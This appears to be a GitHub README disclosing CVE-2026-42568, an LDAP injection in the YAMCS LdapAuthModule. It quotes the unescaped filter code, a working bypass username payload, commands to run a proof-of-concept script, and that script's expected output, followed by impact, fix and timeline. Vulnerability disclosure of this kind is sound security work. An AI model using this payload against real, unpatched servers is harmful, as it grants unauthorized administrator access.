ex-cal1bur/CVE-2026-42568

# CVE-2026-42568 — YAMCS LDAP Injection in LdapAuthModule ## Summary An LDAP injection vulnerability exists in `org.yamcs.security.LdapAuthModule`. The username parameter is inserted directly into LDAP search filters without RFC 4515 escaping, allowing authentication bypass. | Field | Value | |-------|-------| | **CVE** | CVE-2026-42568 | | **Severity** | MEDIUM | | **CWE** | CWE-90: Improper Neutralization of Special Elements in LDAP Query | | **Affected** | yamcs-core < 5.12.7 (with LDAP auth configured) | | **Fixed in** | yamcs-core 5.12.7 | | **Advisory** | [GHSA-cqh3-jg8p-336j](https://github.com/yamcs/yamcs/security/advisories/GHSA-cqh3-jg8p-336j) | ## Vulnerability Details **Root cause (`LdapAuthModule.java`):** var filter = userFilter.replace("{0}", username); // username inserted directly — no RFC 4515 escaping With a typical `userFilter` of `(uid={0})`, a malicious username breaks the filter structure: Input: *)(uid=*))(|(uid=* Filter: (uid=*)(uid=*))(|(uid=*) Result: Universal match — authentication bypassed ## Proof of Concept pip install requests python3 poc.py http://localhost:8090 Expected output on vulnerable instance (with LDAP configured): [1] Universal bypass (any account) Username: *)(uid=*))(|(uid=* Password: anything Result: HTTP 200 [!!!] AUTHENTICATION BYPASSED [!!!] Token received: eyJhbGciOiJSUzI1NiJ9... ## Impact An unauthenticated attacker who can reach the YAMCS server can bypass authentication entirely when LDAP auth is configured, gaining access as an arbitrary user including administrators. ## Fix Upgrade to `yamcs-core >= 5.12.7`. The fix applies RFC 4515 escaping to the username before constructing the LDAP filter. ## Timeline | Date | Event | |------|-------| | 2026-05 | Vulnerability reported | | 2026-05-26 | Fix released in yamcs-core 5.12.7 | | 2026-05-26 | Public advisory published | ## Researcher **Daniel Miranda Barcelona (Excal1bur)** - GitHub: [https://github.com/ex-cal1bur](https://github.com/ex-cal1bur) - LinkedIn: [https://linkedin.com/in/daniel-miranda-barcelona](https://linkedin.com/in/daniel-miranda-barcelona) - Blog: [https://thedumpster.es](https://thedumpster.es)